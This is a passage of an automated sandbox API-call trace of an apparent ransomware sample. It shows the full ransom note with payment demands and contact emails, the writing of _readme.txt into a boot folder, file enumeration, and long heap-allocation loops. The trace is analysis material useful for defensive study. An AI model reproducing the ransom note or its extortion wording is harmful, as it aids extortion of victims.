restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" [0179.140] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d16e48 [0179.140] CreateFileW (lpFileName="C:\\Boot\\ja-JP\\_readme.txt" (normalized: "c:\\boot\\ja-jp\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0179.141] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d16e48 | out: hHeap=0x6a0000) returned 1 [0179.141] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32670 | out: hHeap=0x6a0000) returned 1 [0179.141] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0179.141] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.141] FindFirstFileW (in: lpFileName="C:\\Boot\\ja-JP\\*" (normalized: "c:\\boot\\ja-jp\\*"), lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956aa140, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28daa640, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28daa640, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cbfa10 [0179.142] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.142] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956aa140, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28daa640, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28daa640, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0179.142] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956aa140, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28daa640, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe8216d3c, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x12a40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0179.142] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.142] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f2d0 [0179.142] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.142] PathFindExtensionW (pszPath="C:\\Boot\\ja-JP\\bootmgr.exe.mui") returned=".mui" [0179.142] CreateFileW (lpFileName="C:\\Boot\\ja-JP\\bootmgr.exe.mui" (normalized: "c:\\boot\\ja-jp\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0179.143] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f2d0 | out: hHeap=0x6a0000) returned 1 [0179.143] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956aa140, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28daa640, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe8216d3c, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x12a40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0179.143] FindClose (in: hFindFile=0x2cbfa10 | out: hFindFile=0x2cbfa10) returned 1 [0179.144] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.144] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fe0 | out: hHeap=0x6a0000) returned 1 [0179.144] PeekMessageW (in: lpMsg=0x30fff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fff08) returned 0 [0179.144] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fe0 [0179.144] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0179.144] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.144] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0179.144] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.145] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.145] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.145] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0179.145] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.145] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.145] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.146] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0179.146] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.146] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.146] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.146] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0179.146] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.147] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.147] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.147] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0179.147] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.147] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.147] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.147] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0179.148] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.148] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.148] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.148] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0179.148] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d2ec90 [0179.149] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.149] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.150] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.150] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.150] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0179.150] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.150] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.150] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.150] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0179.151] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.151] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.151] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.151] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0179.151] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.151] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.152] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.152] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0179.152] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.152] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.152] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.152] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0179.153] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.153] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.153] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.153] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0179.153] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.153] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.153] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.153] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0179.154] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.154] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.155] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.155] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0179.155] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.155] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.155] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.155] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0179.156] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.156] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.156] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.156] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0179.156] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.157] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.157] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.157] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0179.157] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.157] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.157] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.157] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0179.158] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.158] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.158] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.158] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0179.158] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.159] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.159] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.159] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0179.159] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.159] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.159] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.159] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0179.160] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.160] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.160] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.160] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0179.160] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0179.160] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.160] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.161] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.161] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.161] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0179.161] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.161] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.161] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.161] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0179.161] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d2ec90 [0179.162] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.162] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.162] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.162] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.162] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0179.162] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.163] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.163] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.163] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0179.163] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.163] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.163] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.163] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0179.163] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.164] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.164] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.164] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0179.164] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.164] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.164] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.164] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0179.164] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0179.165] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.165] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.165] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.165] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.165] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0179.166] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.166] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.166] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.166] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0179.166] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.167] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.167] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.167] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0179.167] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.167] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.167] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.167] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0179.168] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.168] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.168] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.168] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0179.168] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.168] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.168] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.168] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0179.169] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.169] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.169] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.169] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0179.169] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.170] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.180] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.180] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0179.181] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.181] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.182] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.182] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0179.183] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.183] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.183] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.183] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0179.183] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0179.184] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.184] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.185] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.185] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.185] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0179.185] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0179.185] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.185] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.186] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0179.187] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0179.188] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0179.188] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0179.188] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0179.188] HeapFree (in: hHeap=0x6a0000, 